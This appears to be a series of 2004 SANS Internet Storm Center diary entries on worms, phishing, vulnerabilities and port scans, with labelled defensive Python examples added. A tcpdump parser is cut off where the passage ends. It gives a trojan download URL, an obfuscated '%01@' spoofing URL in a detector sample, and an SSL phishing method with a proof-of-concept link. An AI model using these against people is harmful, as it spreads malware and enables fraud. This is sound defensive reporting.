This gets redirected to http://d558597.u25.surftown.com/mstasks.exe
mstasks.exe is identified by Symantec/Norton AntiVirus beta definitions as "Trojan.Etsur".

Repeat after me: Unless you subscribe to their email security notification service, Microsoft's policy is not to send notification of vulnerabilities. They never send patches in email to users.

A new polymorphic virus has been reported by Network Associates.
W32/Polybot.gen!irc is a polymorphic variant of the W32/Gaobot worm. It encrypts itself, which may allow it to go undetected by antivirus software. Currently NA lists it as a low risk. It spreads through shares and can use the vulnerability described in Microsoft Security Bulletin MS03-026; ports 80, 135, 139, 445 and 593 are all possibly affected by that vulnerability. A new variant of this virus family has been discovered that uses the filename soundman.exe.

For Network Associates full writeup see:
http://vil.nai.com/vil/content/v_101100.htm

We received one report of a virus using a picture file format (bmp) to provide the password. Several antivirus products can pull the password out of the email text and decrypt the password-protected zip file (detected as bagle.pwdzip), finding the virus inside. Using bitmaps or other image file formats will make it more difficult for antivirus vendors to extract the password. This password-in-a-picture method has been used by other systems to prevent automated abuse.

0 Comments

Published: 2004-03-15

Anti-spam list shutoff; Special report on "phishing" attacks

Anti-spam list shutoff

We received notice from some folks that have been affected by the
DNS-based anti-spam service shutoff from Monkeys.com. It appears they
have shut off this service after giving warning to users.

From: http://www.monkeys.com/dnsbl/

"NOTICE: All Monkeys.Com DNS anti-spam lists were shut down and
discontinued on September 23rd, 2003. As of Sunday March 15th, 2004,
the final shutdown phase for these lists has begun and as of now every
IP address in the world has been listed on the former Monkeys.Com
anti-spam lists as a final inducement to get other Internet sites to
stop referring to our former anti-spam lists.

Please note that we have made all reasonable attempts to contact all of
the different mail server administrators at all of the different
Internet sites that have been using our anti-spam lists, and we have
tried to convince them all to stop improperly making references to our
former anti-spam lists, however our records indicate that despite these
efforts, as of Sunday, March 14th, 2004, there are still over 1,500
different Internet sites that are still improperly referring to the
various Monkeys.Com anti-spam lists. (All of these anti-spam lists were
officially shut down and discontinued way back in September of 2003,
and a public announcement of the shutdown was made at the time. Also,
and additionally, a final end-of-life public notice was posted to
various anti-spam mailing lists and newsgroups on February 10th,
2004.)"
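A check a mail administrator can run before trusting any DNS blocklist, added here as an example (not code from Monkeys.com or the ISC): a shut-down list that has been wildcarded, as the notice describes, answers for every address including 127.0.0.1, which a live list must never list. The zone names and the stand-in resolvers are constructed for the demonstration.

```python
"""Sanity-check a DNS blocklist before acting on it.  Added example, not
code from the diary or from Monkeys.com.  Convention used (RFC 5782): a
live list answers for the test address 127.0.0.2 and never for 127.0.0.1;
a shut-down list that has been wildcarded answers for everything, so the
clean address comes back "listed" and every mail would be rejected."""
import socket

# Zone names used below are placeholders, not real blocklists.
TEST_LISTED = "127.0.0.2"   # must be listed by any working DNSBL
TEST_CLEAN = "127.0.0.1"    # must never be listed


def dnsbl_query_name(ip, zone):
    """Build the reversed-octet query name, e.g. 4.3.2.1.zone for 1.2.3.4."""
    octets = ip.split(".")
    if len(octets) != 4:
        raise ValueError("IPv4 address expected: %r" % ip)
    return ".".join(reversed(octets)) + "." + zone


def is_listed(ip, zone, resolve=socket.gethostbyname):
    """True if the DNSBL returns an A record for ip.  NXDOMAIN (gaierror)
    means 'not listed'.  `resolve` is injectable so the check can be run
    offline; by default it performs a real DNS lookup."""
    try:
        resolve(dnsbl_query_name(ip, zone))
    except socket.gaierror:
        return False
    return True


def dnsbl_health(zone, resolve=socket.gethostbyname):
    """Classify a list as 'healthy', 'lists-everything' or 'not-responding'."""
    if is_listed(TEST_CLEAN, zone, resolve):
        return "lists-everything"      # wildcarded / end-of-life behaviour
    if not is_listed(TEST_LISTED, zone, resolve):
        return "not-responding"        # list gone, or DNS trouble
    return "healthy"


def should_reject(ip, zone, resolve=socket.gethostbyname):
    """Act on a listing only when the list itself passes the health check;
    a wildcarded list would otherwise reject all inbound mail."""
    if dnsbl_health(zone, resolve) != "healthy":
        return False
    return is_listed(ip, zone, resolve)


# --- constructed stand-in resolvers so the example runs offline ----------
def healthy_resolver(name):
    """Lists only the test address and one spam source (6.7.8.9)."""
    listed = {"2.0.0.127.live.dnsbl.example", "9.8.7.6.live.dnsbl.example"}
    if name in listed:
        return "127.0.0.2"
    raise socket.gaierror(-2, "Name or service not known")


def wildcarded_resolver(name):
    """Behaves like the shut-down list: every query returns a listing."""
    if name.endswith(".dead.dnsbl.example"):
        return "127.0.0.2"
    raise socket.gaierror(-2, "Name or service not known")


def silent_resolver(name):
    """A zone that no longer exists at all."""
    raise socket.gaierror(-2, "Name or service not known")


if __name__ == "__main__":
    print("live list:", dnsbl_health("live.dnsbl.example", healthy_resolver))
    print("dead list:", dnsbl_health("dead.dnsbl.example", wildcarded_resolver))
    print("reject 6.7.8.9 via live list?",
          should_reject("6.7.8.9", "live.dnsbl.example", healthy_resolver))
    print("reject 6.7.8.9 via dead list?",
          should_reject("6.7.8.9", "dead.dnsbl.example", wildcarded_resolver))
```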

------------------------------------------------------------------------

US Department of Justice issues special report on "phishing" attacks

The Department of Justice has issued a special report on the rise of
"phishing" attacks. It contains contact information for banks and
service providers who can help respond to a phishing attack. The report
also has helpful hints for identifying and responding to these attacks.

http://www.antiphishing.org/DOJ_Special_Report_On_Phishing_Mar04.pdf

0 Comments

Published: 2004-03-13

Oracle Application Server Web Cache Vulnerabilities; Port 65506

Oracle Application Server Web Cache Vulnerabilities

Oracle has reported security vulnerabilities in Oracle Application Server Web Cache 10g (9.0.4.0.0) and Oracle9i Application Server Web Cache.

The nature of the vulnerabilities is not disclosed. However, Oracle has assigned a severity rating of 1, which is considered to be high risk.

According to the report, all Oracle supported platforms (Sun Solaris, HP/UX, HP Tru64, IBM AIX, Linux and Windows) are affected. The only exception is Oracle Application Server Web Cache 10g (9.0.4.0.0) on Windows, Tru64 and AIX.

For details, please refer to:
http://otn.oracle.com/deploy/security/pdf/2004alert66.pdf

Port 65506

We have seen an increase in scans on port 65506 over the last few days. This could be due to scanning for the Phatbot SSL proxy. Let us know if you have further information on this.

http://isc.sans.org/port_details.html?port=65506
http://www.dslreports.com/forum/remark,9644670~mode=flat

0 Comments

Published: 2004-03-12

Compaq Web Management, BJs Alerts of Possible Credit Card Theft

Immunity Advisory: Compaq Web Management Vulnerability

Immunity, Inc. released an advisory regarding a vulnerability in Compaq Web Management (HP HTTP).
"Compaq Web Management includes a number of daemons, which listen on a number of TCP ports, and also to SNMP requests. On port 2381, an SSL HTTP server runs. If the system is configured to let anonymous users browse it, a common configuration, then a bug in the validation system allows users to upload their own certificates to be trusted by the client system. This would allow that machine to be administered remotely via such mechanisms as Secure Task Execution. This is considered a critical problem, as Compaq Web Management is often installed on every machine in an enterprise."

Complete advisory is available at:

http://www.immunitysec.com/downloads/hp_http.sxw.pdf

Banking Group Comments on "Phishing" Losses

"Phishing" schemes have been increasing in frequency over the past year. These usually involve messages sent to users' e-mail boxes claiming to come from banks, e-bay, paypal, etc., which direct users to a web site that appears to be legitimate. From that web site, users are asked to provide personal and/or financial details that may be used for identity theft or other forms of fraud.

The Australian Bankers' Association comments in a ZDNet article that the losses from these schemes "are not material enough" to warrant boosting online banking security, compared to "other forms of graft such as credit card fraud."

http://news.zdnet.co.uk/internet/security/0,39020375,39148259,00.htm

BJ's Wholesale Club Alerts Members of Potential Credit Card Leak

BJ's has issued a press release stating that a small fraction of its 8 million members may have been affected by a compromise that may have resulted in the theft of their credit card information. BJs has made additional customer care representatives available to assist members whose credit card may have been stolen. If you suspect unauthorized use of any credit card used at BJ's, you should report it to the credit card issuer or bank. Additional questions should be directed to 1-800-BJS-CLUB.

More Information is available at:

http://www.bjs.com/news/content/item234.shtml

http://www.msnbc.msn.com/id/4516301/

http://money.cnn.com/2004/03/12/news/companies/bj.reut/

------------------------------


Dave Brookshire, SANS Handler-on-Duty

0 Comments

Published: 2004-03-11

MS04-009 Upgraded to Critical, Disable Outlook HTML Parser, 'Phatbot', NetSky Day

(Handler's comment: we got off by one day on our diaries. The material below was originally posted on March 10th. I've updated it to reflect new information from March 11th. We'll be back on track tomorrow. -sachs)



MS04-009 Updated to 'Critical'. One of yesterday's Microsoft advisories ("Outlook 2002 mailto arbitrary code execution") was upgraded from 'Important' to 'Critical'. The initial advisory indicated that the vulnerability is mitigated by using a default homepage other than "Outlook Today". However, as pointed out in a proof of concept exploit, it is possible to cause code execution even if another view (e.g. Inbox) is used as the default homepage. We strongly recommend application of the respective patches as quickly as possible.


(Update 3/11/04) iDefense reported that it is possible for an attacker to force Outlook to start in the "Outlook Today" view. Details are at
http://www.idefense.com/application/poi/display?id=79&type=vulnerabilities

Reading HTML e-mail as plain text in Outlook. By default, Outlook will parse "nonsecure" HTML e-mail. This feature has been abused by numerous phishing e-mails and similar cognitive hacking schemes. Microsoft published a step by step guide on how to turn off the HTML parser. This modification has no effect on digitally signed or encrypted HTML e-mail. See http://support.microsoft.com/default.aspx?scid=kb;en-us;Q307594 for details. This feature is only available with Outlook 2002 if SP1 for Microsoft Office XP is installed.

Phatbot. For the last couple of days yet another bot has been hunting for MyDoom-infected systems. This bot/worm will also scan for vulnerable DameWare installs, systems vulnerable to the RPC DCOM exploit, and open file shares. At this point, this bot does not appear to make a significant impact globally. This bot is however significant as it is using P2P techniques to communicate. Infected systems can be spotted by outbound port 1025 scans. At this point, we track about 5,000 infected systems.

http://isc.sans.org/port_details.html?port=1025

http://www.dslreports.com/forum/remark,9614814~mode=flat
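One way to spot the outbound port 1025 sweeps the entry describes in your own firewall logs, added here as an example (not ISC code): a host that touches many distinct neighbours on one port in a short span is fanning out like a scanner, while ordinary RPC endpoint-mapper traffic goes to the same few servers repeatedly. The log format and every sample line are constructed, and the port is a parameter so the same check works for any port.

```python
"""Flag hosts fanning out to TCP/1025, the outbound-scan pattern given in
the diary as the sign of a Phatbot infection.  Added example, not ISC
code; the log format ("date time action src dst proto dport") and all
sample lines are constructed for the demonstration."""
import re
from collections import defaultdict

LINE_RE = re.compile(
    r"^(?P<date>\S+) (?P<time>\S+) (?P<action>\w+) "
    r"(?P<src>\d{1,3}(?:\.\d{1,3}){3}) (?P<dst>\d{1,3}(?:\.\d{1,3}){3}) "
    r"(?P<proto>TCP|UDP) (?P<dport>\d+)$"
)

# Constructed sample: 10.1.1.20 sweeps six neighbours on 1025 (bot-like),
# 10.1.1.30 talks to one endpoint mapper three times (ordinary Windows
# traffic), 10.1.1.40 browses five web servers on port 80.
SAMPLE_LOG = """\
2004-03-10 14:02:01 DROP 10.1.1.20 10.1.2.1 TCP 1025
2004-03-10 14:02:01 DROP 10.1.1.20 10.1.2.2 TCP 1025
2004-03-10 14:02:01 DROP 10.1.1.20 10.1.2.3 TCP 1025
2004-03-10 14:02:02 ACCEPT 10.1.1.20 10.1.2.4 TCP 1025
2004-03-10 14:02:02 DROP 10.1.1.20 10.1.2.5 TCP 1025
2004-03-10 14:02:02 DROP 10.1.1.20 10.1.2.6 TCP 1025
2004-03-10 14:03:10 ACCEPT 10.1.1.30 10.1.2.7 TCP 1025
2004-03-10 14:03:11 ACCEPT 10.1.1.30 10.1.2.7 TCP 1025
2004-03-10 14:03:12 ACCEPT 10.1.1.30 10.1.2.7 TCP 1025
2004-03-10 14:04:00 ACCEPT 10.1.1.40 192.0.2.10 TCP 80
2004-03-10 14:04:01 ACCEPT 10.1.1.40 192.0.2.11 TCP 80
2004-03-10 14:04:02 ACCEPT 10.1.1.40 192.0.2.12 TCP 80
2004-03-10 14:04:03 ACCEPT 10.1.1.40 192.0.2.13 TCP 80
2004-03-10 14:04:04 ACCEPT 10.1.1.40 192.0.2.14 TCP 80
this line is malformed and must be skipped
"""


def parse_log(text):
    """Yield one dict per well-formed line; malformed lines are skipped."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m is not None:
            yield m.groupdict()


def fan_out(text, port=1025, proto="TCP"):
    """Map each source to the set of distinct destinations it contacted
    on the given port.  Drops count too: a DROP still shows the attempt."""
    targets = defaultdict(set)
    for rec in parse_log(text):
        if rec["proto"] == proto and int(rec["dport"]) == port:
            targets[rec["src"]].add(rec["dst"])
    return dict(targets)


def suspected_bots(text, port=1025, min_targets=5, proto="TCP"):
    """Sources that reached at least min_targets distinct hosts on port."""
    return sorted(src for src, dsts in fan_out(text, port, proto).items()
                  if len(dsts) >= min_targets)


if __name__ == "__main__":
    for src in suspected_bots(SAMPLE_LOG):
        n = len(fan_out(SAMPLE_LOG)[src])
        print("%s: %d distinct hosts on TCP/1025, check for Phatbot" % (src, n))
```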

(Update 3/11/04) Netsky Day. An advisory yesterday from Pandasoft suggested that March 11th might show an increase in Netsky virus activity. The ISC did not detect any such increase. There was a new variant of Netsky released late on the 10th, and it seems to function much like the previous versions. http://www.pandasoftware.com/about/press/viewNews.aspx?noticia=4852


------

Johannes Ullrich, jullrich_AT_sans.org (handler 3/10/04)

Marcus H. Sachs, msachs_AT_sans.org (handler 3/11/04)

0 Comments

Published: 2004-03-10

MS Monthly Updates Released

MS Monthly Updates Released

---------------------------------------------

Microsoft has released three updates on its regular "second Tuesday of the month" schedule:


UPDATE:
MS04-009 was raised from 'Important' to 'Critical'.



Microsoft Security Bulletin MS04-008 describes a possible DoS condition within Windows Media Services. The issue affects only Microsoft Windows 2000 Server Service Pack 2, Microsoft Windows 2000 Server Service Pack 3, and Microsoft Windows 2000 Server Service Pack 4. The only vulnerable version of Windows Media Services is version 4.1 for Windows Server 2000. If you are unable to patch an affected system, a possible work-around would be to block port 7007 and 7778 at the firewall. Note: Blocking port 7007 will keep multicast streams and playlists from being streamed to the Internet. Blocking port 7778 will disable remote administration of Windows Media Services. This issue is listed by Microsoft as having a severity of "Moderate."





http://www.microsoft.com/technet/security/bulletin/MS04-008.mspx



Microsoft Security Bulletin MS04-009 describes a vulnerability in Microsoft's HTML rendering code (on machines with Outlook 2002 installed) that could allow a malicious HTML to execute script code within the "Local Machine" zone on an unprotected system. It appears that anything that uses Microsoft's HTML rendering code on such a machine could be vulnerable. The issue is caused by the way Outlook 2002 handles certain "mailto" URLs. (Note: Outlook 2002 is both a stand-alone product and a part of Office XP.) For situations where patches cannot be applied, Microsoft suggests that the issue can be mitigated by changing Outlook's default start page to something besides "Outlook Today." We have additional information which suggests, however, that this mitigation is ineffective and can be easily circumvented. We would suggest that you switch to viewing email as "text only" if you are unable to patch. (Note: This will only mitigate attack via a malicious email. It does nothing to protect you from other HTML vectors that may exploit this vulnerability.) Microsoft has listed this issue as having a severity of "Critical."





http://www.microsoft.com/technet/security/bulletin/MS04-009.mspx



additional information:



http://secunia.com/advisories/11076/

http://www.idefense.com/application/poi/display?id=79&type=vulnerabilities
http://www.kb.cert.org/vuls/id/305206




The third update, Microsoft Security Bulletin MS04-010, covers a possible information disclosure in Microsoft MSN Messenger. This issue affects Microsoft MSN Messenger versions 6.0 and 6.1, and does not affect any versions of Microsoft Messenger. Because of a flaw in the way that MSN Messenger handles file requests, a remote attacker could view the contents of files at known locations on a user's system. Microsoft has listed the severity of this issue as "Moderate."





http://www.microsoft.com/technet/security/bulletin/MS04-010.mspx





---------------------------------------------

Handler on duty: Tom Liston - ( http://www.labreatechnologies.com )

0 Comments

Published: 2004-03-09

Users still double clicking email attachments, MSJVM Removal Tool 1.0, Upcoming ISC Webcast

FYI - Some AV Vendors will not have virus detection signatures for new variants of mass mailing viruses available for download until Tuesday, MARCH 9th, when Microsoft will be offering megabytes of security patches for unfixed vulnerabilities. The second Tuesday of the month is Microsoft's scheduled Security Bulletin release day.

Microsoft Security Bulletin Search
http://www.microsoft.com/technet/security/current.aspx

Sober.D

The W32.Sober.D@mm has received a higher alert rating from some AV vendors as users continue to open attachments from unknown senders. Sober.D should undoubtedly benefit from some synergy with today's anticipated Microsoft Security Bulletin announcement. The synergy will come from Microsoft, which may be mass mailing users to announce new Security Bulletins. If your network allows attachments, it may save you some clean-up time if there's a gentle reminder sent out that Microsoft's policy is to never send emails with attachments. Sober.D presents itself as a "virus alert" from Microsoft with the infected attachment. (Win32.Sober.D [Computer Associates], W32/Sober.d@MM [McAfee], WORM_SOBER.D [Trend])

Last but not least on virus variants, you can check with your favorite AV vendor for signatures to detect the latest crop of variants:
W32.Netsky.K@mm
W32.Keco@mm
W32.Netsky.J@mm

MS announces its MSJVM Removal Tool 1.0

"The Microsoft JVM Removal Tool can be used to remove the MS Java Virtual Machine (MSJVM). Use of this tool is the only supported method for removing the MSJVM from a Microsoft operating system."

http://www.microsoft.com/downloads/details.aspx?FamilyID=f2002119-b4d5-4013-83bc-4a8ad95e959f&DisplayLang=en

ISC Webcast. The monthly Internet Storm Center webcast is on Wednesday, March 10th at 1pm EST. Join us for a solid hour of discussion about new threats we've seen this past month, including deconfliction of all of the new viruses, port activity, new software vulnerabilities, and other items of Internet security interest. Details for tuning in are online at:
http://www.sans.org/webcasts/show.php?webcastid=90486

Patrick Nolan

0 Comments

Published: 2004-03-08

SoberD@MM from spoofed Microsoft email addresses, new version of Netsky

SoberD@MM

AV vendors are releasing signatures for SoberD, a new mass mailer with an attached executable or zip file. The email's subject line is "Microsoft Alert: Please Read!" or "Microsoft Alarm: Bitte Lesen!"

Check with your AV vendor for signature updates.

http://vil.nai.com/vil/content/v_101081.htm
http://securityresponse.symantec.com/avcenter/venc/data/w32.sober.d@mm.html
http://www.f-secure.com/v-descs/sober_d.shtml

The body of the English version of the SoberD email starts with:
"New MyDoom Virus Variant Detected!

A new variant of the W32.Mydoom (W32.Novarg) worm spread rapidly .........:"

New version of Netsky

Netsky has a new version that is called W32.Netsky.I@mm by Symantec. The new version was discovered today and Symantec has released an updated definition for it. This version behaves like the rest; however, its subject lines make it more enticing for a user to open. The From line is service@yahoo.com, and the message uses one of three different subject or body lines that lead the user to believe their account with Yahoo has been closed. There is an attachment that looks like a valid link to Yahoo for the user to click on to reactivate their account.

For more information see:

http://securityresponse.symantec.com/avcenter/venc/data/w32.netsky.i@mm.html

Handler on Duty: Lorna Hutcheson

0 Comments

Published: 2004-03-07

New version of Netsky

New version of Netsky

Netsky has a new version that is called W32.Netsky.I@mm by Symantec. The new version was discovered today and Symantec has released an updated definition for it. This version behaves like the rest; however, its subject lines make it more enticing for a user to open. The From line is service@yahoo.com, and the message uses one of three different subject or body lines that lead the user to believe their account with Yahoo has been closed. There is an attachment that looks like a valid link to Yahoo for the user to click on to reactivate their account.

For more information see:

http://securityresponse.symantec.com/avcenter/venc/data/w32.netsky.i@mm.html

Handler on Duty: Lorna Hutcheson

0 Comments

Published: 2004-03-06

Beagle Backdoor Port, Wakeup Call from NetSky.G and NetSky.H

Beagle Backdoor Port

All variants of the Beagle virus so far have opened a listener on TCP/2745. One source has indicated that there is underground activity in making this port accessible for arbitrary remote code execution on Beagle infected machines. We've seen an increase in scanning for this port over the past few days as well. Organizations can use this "feature" of the Beagle virus to scan their own networks to track down infected machines by scanning for TCP/2745.

Wakeup Call from NetSky.G and NetSky.H

Symantec Security Response reported that systems infected with NetSky G and H variants will get a wakeup call from their PC speakers on March 8th between 11:00am and 12:00pm local time (H variant) or March 10th between 6:00am and 9:00am local time (G variant):
"If an infected computer's time is between 6:00 A.M. and 9:00 A.M. on Tuesday, March 10, 2004, the PC speaker will beep in a continuous loop. Each beep will be for a random period of time, at a random frequency."

http://www.sarc.com/avcenter/venc/data/w32.netsky.g@mm.html

"If an infected computer's system clock is between 11:00 A.M. and 12:00 P.M. on March 8, 2004, the PC speaker will beep in a continuous loop. Each beep will be for a random period of time, at a random frequency."

http://www.sarc.com/avcenter/venc/data/w32.netsky.h@mm.html

Note that March 10th, 2004 is a Wednesday, not a Tuesday as indicated on the Symantec website. Thanks to the astute reader who pointed this out.

--Joshua Wright/Handler on Duty

0 Comments

Published: 2004-03-05

Latest Viruses, SSL Exploit, Juniper Update, New ISC Features

Latest Virus Versions. New versions of MyDoom and NetSky were reported today. Here's the current scoreboard for the top three viruses:

NetSky (first observed on February 16th): Variant H

Bagel (first observed on January 18th): Variant K

MyDoom (first observed on January 26th): Variant H


Another SSL Exploit. A reader provided the Storm Center with the following information:


The basic attack: Get a certificate from a known and trusted CA server. *Any* certificate will work. Because the certificate is trusted, the user is never prompted. In this example, we are pretending that "PayPal" is our hostile server. Use the URL "%01" defect to hide the actual server name. The phishing target in this example is "Microsoft".

When a user visits the site, they see "https://www.microsoft.com/" and an SSL lock. But the certificate and web contents actually come from the hostile server, and the user was never prompted about a problem.

The only way to tell if the certificate is valid is to actually double-click on the little lock and check the certificate manually. And you would need to do that for EVERY web page you visit and EVERY image you load. (HTML and images may come from other servers.)

If we used frames, then the key only corresponds with the main frame's certificate, not the web pages in each frame.

Proof of concept:

http://lab.securescience.net/exploits/ssl-phish.htm

(View using Internet Explorer)
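For mail filters and incident responders, a function that reports where such a link really connects, added here as an example (not the reader's or the ISC's code): a browser ignores anything before the "@" in a URL, so the name a user reads at the start of the address is not the host that serves the page. The sample URLs are constructed; the hostile host name is a placeholder.

```python
"""Report which server a link really reaches.  Added example, not the
reader's or the ISC's code.  Everything before an '@' in the authority
part of a URL is user information that the browser ignores when
connecting; the "%01" seen in the report is a percent-encoded control
character that keeps the real host out of the address bar.  All URLs used
here are constructed samples."""
import re
from urllib.parse import urlsplit, unquote

# Percent-encoded ASCII control characters, %00 through %1F.
CONTROL_ESCAPE = re.compile(r"%[01][0-9A-Fa-f]")


def _printable(text):
    """Drop control characters so the lure name reads as a user sees it."""
    return "".join(c for c in text if ord(c) >= 0x20)


def real_destination(url):
    """Return the host the browser connects to, the host name a user would
    take the link for, and the reasons (if any) the link is suspect."""
    parts = urlsplit(url)
    connect_host = (parts.hostname or "").lower()
    userinfo = parts.netloc.rsplit("@", 1)[0] if "@" in parts.netloc else ""
    user_part = userinfo.split(":", 1)[0]        # strip any password part
    reasons = []
    if userinfo:
        reasons.append("user info before '@'; the browser ignores it")
        if "." in user_part:
            reasons.append("user name looks like a host name")
        if CONTROL_ESCAPE.search(userinfo) or \
                any(ord(c) < 0x20 for c in unquote(userinfo)):
            reasons.append("control character hides the real host")
    lure_host = _printable(unquote(user_part)).lower() if userinfo else connect_host
    return {
        "scheme": parts.scheme.lower(),
        "lure_host": lure_host,
        "connect_host": connect_host,
        "reasons": reasons,
    }


def spoofs_host(url, expected_host):
    """True when the link presents expected_host but connects elsewhere."""
    info = real_destination(url)
    return info["lure_host"] == expected_host.lower() and \
        info["connect_host"] != expected_host.lower()


if __name__ == "__main__":
    for sample in ("https://www.microsoft.com%01@hostile.example/",
                   "https://www.microsoft.com/"):
        info = real_destination(sample)
        print(sample)
        print("  connects to:", info["connect_host"])
        print("  looks like: ", info["lure_host"])
        for reason in info["reasons"]:
            print("  -", reason)
```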



Juniper Updates. Juniper Networks has updated software available for registered users. Stay tuned for additional details as they are made public.



New at the Storm Center. We've added a new search box above the main chart where users can enter any UDP or TCP port and retrieve current data on that port. Also, we've added the ability to upload a file when using the online form at

http://isc.sans.org/contact.html

If you upload malware, please ZIP, RAR, or TAR it and if possible encrypt it with the password "infected". Also be sure to mention in your note that you've attached something evil. As you know, it's not nice to fool Mother Nature. :)



Marcus H. Sachs

The SANS Institute

0 Comments

Published: 2004-03-04

SSL Phishing Scam / FreeBSD DoS Vulnerability / Acrobat Reader Flaw

SSL Phishing Scam



Phishing scams are becoming very common. While some of them are easy to recognize, some are becoming very difficult to detect due to improved techniques that exploit browser vulnerabilities, e.g. URL obfuscation.


A recent advisory from the US Federal Trade Commission about how to recognize "safe" websites when conducting sensitive transactions contained an incorrect statement.
The statement implied that if a lock icon was visible then SSL was in use and the site was safe.
The lock icon does show that a site is using SSL, but since the certificate could be a fraudulent one, it is not possible to tell fake from real websites by the lock icon alone.

So, while you can be sure that the session is encrypted, you cannot be sure that you are talking to the real organization.


Fraudulent certificates are also widely used in phishing scams, so it is a good idea to always verify the certificate.


*Update*

Dr. Neal Krawetz, from Secure Science Corporation, just sent an email about the SSL/ lock icon issue:

"One of the SSL encoding methods is "plain text".
Most SSL servers have this disabled by default, but most browsers support it.
When plain text is used, no central certificate authority is consulted and the user never sees a message asking if a certificate should be accepted (because "plain text" doesn't use certificates).

Keeping that in mind, the little lock icon may not even indicate an encrypted channel. The little lock only indicates an SSL connection."

References: http://www.ftc.gov/bcp/conline/pubs/online/cybrsmrt.htm

http://www.zdnet.com.au/news/security/0,2000061744,39116416,00.htm

FreeBSD vulnerability

iDefense released today a security advisory about a Denial of Service vulnerability on FreeBSD systems.


According to the advisory, remote exploitation of a denial of service condition is possible by sending multiple out-of-sequence packets to a FreeBSD system. To be successful, the attack needs only one open TCP port on the target.
The attack works against all FreeBSD versions.


Even though no PoC has been released yet, this attack looks pretty simple, and FreeBSD users are advised to apply the patches as soon as possible.


Patches are already released and available at FreeBSD.org website:

[FreeBSD 5.2]

ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-04:04/tcp52.patch

[FreeBSD 4.8, 4.9]

ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-04:04/tcp47.patch

References:
http://www.idefense.com/application/poi/display?id=78&type=vulnerabilities&flashstatus=true

Acrobat reader vulnerability



According to a security advisory released by NGSSoftware, there is a buffer overflow vulnerability in Adobe Acrobat Reader in the way it handles the XML Forms Data Format (XFDF).


Also according to the advisory, "Adobe urgently advises users of Adobe Reader to upgrade."



References: http://www.ngssoftware.com/advisories/adobexfdf.txt

http://www.adobe.com/support/downloads/main.html

------------------------------------------------------------

Handler on Duty: Pedro Bueno (bueno@ieee.org)

0 Comments

Published: 2004-03-03

Virus Alphabet, War!, Port 3389 Spike, WinZip Issues

Virus Alphabet



As of the time I write this, the most current versions of the recent virus crop are:



NetSky : Variant F

Bagel: Variant K

MyDoom: Variant G



The most insidious of these is the latest Bagel version, 'K', which sends a message "from" the administrator of the user's email system claiming that their email service is in jeopardy for any of a number of reasons. Although the message content varies, it essentially tells the user that they must run an attached program in order to "fix" whatever issue has caused problems with their email service. Perhaps the most creative aspect of this version, however, is that it uses encrypted zipfiles in order to bypass virus filtering. The password for the file is contained within the context of the message instructing the user how to open the attachment.



-------------------------------------------------------

WAR!



Strings found within the latest versions of NetSky and Bagel seem to indicate that the authors of the current "Top Two" pieces of malware aren't particularly happy with each other. A string found within Bagel.K proclaims "Hey, NetSky, f**k off you b***h!", while a similar message from the author of NetSky says "Skynet AntiVirus - Bagle - you are a looser!!!!"



Perhaps then, here is something they'll understand:



char msg[] = {0x47, 0x72, 0x6F, 0x77, 0x20, 0x75, 0x70, 0x21, 0};



-------------------------------------------------------

Port 3389 Spike



We've noticed a recent spike in port 3389 (terminal services) activity.



http://www.dshield.org/port_report.php?port=3389



Because the number of sources remains low and consistent while the numbers for targets and records spike, we are currently assuming that this is simply a reporting anomaly (caused when a scan hits a large, well-monitored netblock and is therefore "over-reported" when compared with other days). If, however, you see any indication to the contrary, please let us know.

-------------------------------------------------------

WinZip Issues

Because of issues involved with the decoding of MIME parameters within certain archive types (files with .mim, .uue, .uu, .b64, .bhx, .hqx and .xxe extensions), WinZip versions prior to the current release, version 9.0, are vulnerable to a buffer overflow which can lead to the execution of arbitrary code simply by opening a specially crafted archive. If you use WinZip, the ISC recommends that you either upgrade to version 9.0 or disable WinZip's association with the .mim, .uue, .uu, .b64, .bhx, .hqx and .xxe file extensions.

-------------------------------------------------------

Handler on duty: Tom Liston - ( http://www.labreatechnologies.com )

0 Comments

Published: 2004-03-02

WFTPD Patch available, Dell OpenManage vulnerability

Texas Imperial Software has made the patch available for the WFTPD vulnerability.

For unregistered users, the link is http://www.wftpd.com/downloads.htm .

For registered users, you should use the same web site, along with the
user name and password that was emailed to you last September for the
or emailed to you with the software when you purchased it.

Dell OpenManage Vulnerability

A critical security hole in Dell OpenManage server could leave the
product open to attack by an unauthorized user.

The vulnerability is due to a boundary error in the Web server when
handling certain HTTP POST requests. POST is an extremely common HTTP
method for submitting HTML forms, but it can be exploited by sending a
request containing a hidden but extremely long variable to cause a heap
overflow.

http://www.techworld.com/news/index.cfm?fuseaction=displaynews&NewsID=1115

Deb Hale

haled@pionet.net

0 Comments

Published: 2004-03-01

TCP 554 scanning; Linux mremap local root exploit posted

We have observed reasonably widespread scanning for TCP port 554. This
activity may be related to the recent RealNetworks advisory on a
vulnerability in their server product that would enable a remote
attack. The number of attacking source IP addresses is low, which
probably means that this activity is not worm-based.

The activity has occurred as early as February 10, 2004. Activity
prior to this appears to be scanning for previous RealNetworks
vulnerabilities. If you have full packet captures of an established
TCP session on port 554, please submit your logs for further analysis.

http://isc.sans.org/port_details.html?port=554
http://service.real.com/help/faq/security/security022604.html

The following logs show some incoming TCP SYN requests to TCP port 554.
In this case, the SYN attempts were silently dropped by iptables and
so no further traffic was observed. Note that the destination IP
address and timestamps have been modified.

08:21:47.611209 63.201.91.4.1558 > 1.1.1.1.554: S [tcp sum ok]
1231748817:1231748817(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
(ttl 110, id 45589, len 48)

21:55:39.377217 68.145.244.127.4500 > 1.1.1.1.554: S [tcp sum ok]
2723306309:2723306309(0) win 16384 <mss 1460,nop,nop,sackOK> (DF)
(ttl 108, id 29929, len 48)

21:55:42.342745 68.145.244.127.4500 > 1.1.1.1.554: S [tcp sum ok]
2723306309:2723306309(0) win 16384 <mss 1460,nop,nop,sackOK> (DF)
(ttl 108, id 30326, len 48)

16:36:58.621260 203.87.51.2.2718 > 1.1.1.1.554: S [tcp sum ok]
1528706769:1528706769(0) win 8192 <mss 1460> (DF)
(ttl 112, id 50200, len 44)
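
As an added example, not part of the diary, here is a small Python parser for the tcpdump records above. It reports the SYN count per source and flags a retransmitted SYN (the same source port and sequence number seen again with a new IP id), which is what a silently dropped SYN looks like from the sender's side; SAMPLE reproduces the diary's own log lines, with the anonymised 1.1.1.1 destination kept as-is.

```python
"""Parse the tcpdump SYN records shown above and summarise them per source.
Added example, not the diary's own; SAMPLE reproduces the diary's log lines."""
import re
from collections import defaultdict

SAMPLE = """\
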